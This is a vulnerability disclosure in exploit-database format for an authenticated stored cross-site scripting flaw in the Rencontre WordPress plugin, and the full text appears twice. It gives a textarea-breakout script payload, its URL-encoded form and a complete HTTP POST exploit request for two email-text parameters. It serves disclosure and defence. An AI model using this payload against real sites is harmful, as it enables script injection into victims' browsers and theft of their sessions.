sathishshan/#1 Auth_Stored_XSS.txt

## #1 Auth_Stored_XSS.txt
# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 04/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Recontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps

# Description

A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

# Reproduction Steps:

0. Auth Stored XSS in two Parameters

1. Login in WordPress and go to Plugin Email page (http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel)

2. Under the "Introductory text for the summary email (After hello login - Before the smiles and contact requests)" & "Full text for the birthday mail (After hello pseudo)" there is a text area

3. Enter/paste the payload & save

# POC:
Prameter: textmail & textanniv
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

# Exploit Request:

POST /wp-admin/admin.php?page=rencontre.php&renctab=mel HTTP/1.1
Host: 192.168.144.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Connection: close
Cookie: {04425c0c-9ebb-4574-a010-98925da741c5}=value; wordpress_bcee6f23870sd88d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrsdQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4bf797d1f74eedsda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78sdi7qvm2g4d63dgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XEsdSucFBByPmUEdIF%7C84170a324sdg458679871685b28dcb147a2e88ae850eb6c5d8bb2ecc16as36a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1

mailmois=0&textmail=</textarea></td><script>alert('XSS')</script>//&textanniv=</textarea></td><script>alert('XSS')</script>//&qmail=0


# Impact:

An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

# Remediation:

Uninstall the plugin until the vulnerability has been fixed by the developer.

# Disclosure timeline:

04/08/2019 1: Vulnerability identified.
04/08/2019 2: Informed developer of the vulnerability.
14/08/2019 3: No reply from the developer.
	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 04/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

	# Reproduction Steps:

	0. Auth Stored XSS in two Parameters

	1. Login in WordPress and go to Plugin Email page (http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel)

	2. Under the "Introductory text for the summary email (After hello login - Before the smiles and contact requests)" & "Full text for the birthday mail (After hello pseudo)" there is a text area

	3. Enter/paste the payload & save

	# POC:
	Prameter: textmail & textanniv
	Payload: </textarea></td><script>alert('XSS')</script>//
	Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

	# Exploit Request:

	POST /wp-admin/admin.php?page=rencontre.php&renctab=mel HTTP/1.1
	Host: 192.168.144.128
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 133
	Connection: close
	Cookie: {04425c0c-9ebb-4574-a010-98925da741c5}=value; wordpress_bcee6f23870sd88d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrsdQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4bf797d1f74eedsda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78sdi7qvm2g4d63dgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XEsdSucFBByPmUEdIF%7C84170a324sdg458679871685b28dcb147a2e88ae850eb6c5d8bb2ecc16as36a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
	Upgrade-Insecure-Requests: 1

	mailmois=0&textmail=</textarea></td><script>alert('XSS')</script>//&textanniv=</textarea></td><script>alert('XSS')</script>//&qmail=0


	# Impact:

	An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

	# Remediation:

	Uninstall the plugin until the vulnerability has been fixed by the developer.

	# Disclosure timeline:

	04/08/2019 1: Vulnerability identified.
	04/08/2019 2: Informed developer of the vulnerability.
	14/08/2019 3: No reply from the developer.